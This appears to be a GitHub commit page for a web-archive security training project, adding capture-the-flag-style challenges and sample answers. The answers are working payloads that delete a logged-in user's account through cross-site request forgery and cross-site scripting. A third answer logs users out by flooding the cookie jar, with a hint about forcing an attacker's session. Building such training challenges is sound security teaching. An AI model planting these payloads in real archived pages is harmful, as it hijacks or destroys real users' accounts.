Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Reorg, new challenges and sample answers
- Loading branch information
Showing
23 changed files
with
252 additions
and
96 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Submodule archive_server
updated
from 40cf08 to 31f556
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
# add /code to PYTHONPATH | ||
export PYTHONPATH=`pwd`:$PYTHONPATH | ||
|
||
# create users | ||
python webrecorder/admin.py -c david@example.com david Password1 archivist 'David Lightman' | ||
python webrecorder/admin.py -c jennifer@example.com jennifer Password1 archivist 'Jennifer Mack' | ||
|
||
uwsgi /code/apps/frontend.ini |
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
<html> | ||
<head> | ||
<script> | ||
// Write your answer here: | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived or played back, the script tag in this page should use cross-site request forgery to delete the current user account.</p> | ||
</body> | ||
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
short_message = "Use cross-site request forgery to control an archive user's account." | ||
message = """ | ||
<p>In this challenge, the archive server is configured to disable cross-site request forgery protection. | ||
This means captured web content can submit web forms on behalf of a logged in user.</p> | ||
<p>Your mission is to edit {challenge_path}/challenge.html so that, when | ||
<a href="{challenge_url}challenge.html">{challenge_url}challenge.html</a> is captured or played back, | ||
the current user's account is deleted.</p> | ||
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
<html> | ||
<head> | ||
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> | ||
<script> | ||
$(function(){ | ||
var deleteUrl = wbinfo.top_url.split('/').slice(0,4).join('/')+'/$delete'; | ||
$('#deleteForm').attr('action', deleteUrl); | ||
$('#deleteForm').submit(); | ||
}); | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived, the script tag in this page should use cross-site request forgery to delete the user account.</p> | ||
<form id="deleteForm" method="post" action=""> | ||
<input type="submit"> | ||
</form> | ||
</body> | ||
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
<html> | ||
<head> | ||
<script> | ||
// Write your answer here: | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived or played back, the script tag in this page should use cross-site scripting (XSS) to delete the current user account.</p> | ||
</body> | ||
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
CONTENT_HOST = "warcgames.test:8089" | ||
short_message = "Use cross-site scripting (XSS) to control an archive user's account." | ||
message = """ | ||
<p>In this challenge, the archive server is configured to serve the user interface and captured web archive content | ||
on the same domain. This means captured web content can use cross-site scripting (XSS) to control user accounts on the | ||
archive server.</p> | ||
<p>Your mission is to edit {challenge_path}/challenge.html so that, when | ||
<a href="{challenge_url}challenge.html">{challenge_url}challenge.html</a> is captured or played back, | ||
the current user's account is deleted.</p> | ||
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
<html> | ||
<head> | ||
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> | ||
<script> | ||
$(function(){ | ||
// get settings page URL | ||
var settingsUrl = wbinfo.top_url.split('/').slice(0,4).join('/')+'/_settings'; | ||
|
||
// add an iframe to the top level and navigate to settings | ||
$('body', window.__WB_top_frame.document).append('<iframe id="deleteFrame" src="'+settingsUrl+'"></iframe>'); | ||
|
||
// run inside iframe once a second, as a simple way to run once iframe is loaded | ||
setInterval(function(){ | ||
|
||
// get jquery reference to iframe contents | ||
var $iframe = $('#deleteFrame', window.__WB_top_frame.document).contents(); | ||
|
||
// click delete button and confirm | ||
$iframe.find('button[data-target="#confirm-delete-modal"]').click(); | ||
$iframe.find('#confirm-delete').click(); | ||
|
||
}, 1000); | ||
}); | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived or played back, the script tag in this page should use cross-site scripting (XSS) to delete the current user account.</p> | ||
</body> | ||
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
<html> | ||
<head> | ||
<script> | ||
// Write your answer here: | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived or played back, the script tag in this page should use top-level cookies to log out the current user.</p> | ||
</body> | ||
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
CONTENT_HOST = "content.warcgames.test:8089" | ||
short_message = "Use top-level cookies to log out the current user." | ||
message = """ | ||
<p>In this challenge, the archive server is configured to serve captured web archive content at a subdomain | ||
of the user dashboard. This means that captured pages can overwrite session cookies with new top-level cookies.</p> | ||
<p>Your mission is to edit {challenge_path}/challenge.html so that, when | ||
<a href="{challenge_url}challenge.html">{challenge_url}challenge.html</a> is captured or played back, | ||
the current user is logged out.</p> | ||
<p><b>Bonus:</b> With a bit more effort, you can log in the user as a different user -- for example, any visitor | ||
could be logged into an account controlled by the attacker.</p> | ||
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
<html> | ||
<head> | ||
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> | ||
<script> | ||
// fill up cookie jar to wipe login cookie | ||
for (i = 0; i < 1000; i++) { | ||
document.cookie = "cookie" + i + "=chocolate-chips;"; | ||
} | ||
|
||
// bonus: log the user in as the attacker, if you have a valid session key: | ||
// document.cookie = "__wr_sesh=someone_elses_session_key; domain=warcgames.test; path=/"; | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived, the script tag in this page should log out the user by deleting their session cookie.</p> | ||
</body> | ||
</html> |
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Oops, something went wrong.